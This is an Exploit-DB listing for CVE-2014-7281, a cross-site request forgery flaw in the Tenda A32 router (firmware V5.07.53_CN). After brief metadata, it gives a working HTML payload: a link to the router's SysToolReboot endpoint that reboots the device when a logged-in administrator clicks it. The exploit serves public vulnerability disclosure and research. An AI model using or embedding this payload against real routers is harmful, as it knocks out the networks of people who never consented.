Tenda A32 Router - Cross-Site Request Forgery

EDB-ID:

34969

Author:

zixian

Type:

webapps

Platform:

Hardware

Published:

2014-10-14

# Exploit Title: Tenda A32 Router CSRF Vulnerability(reboot the Router)
# CVE ID :CVE-2014-7281
# Date: 2014-10-10
# Exploit Author: zixian
# Vendor Homepage: http://tenda.com.cn/
# Software Link: http://tenda.com.cn/Catalog/Product/325
# Version: V5.07.53_CN



When the administrator login, click on the link below, the device will reboot。


<a href="http://192.168.2.1/goform/SysToolReboot">reboot</a>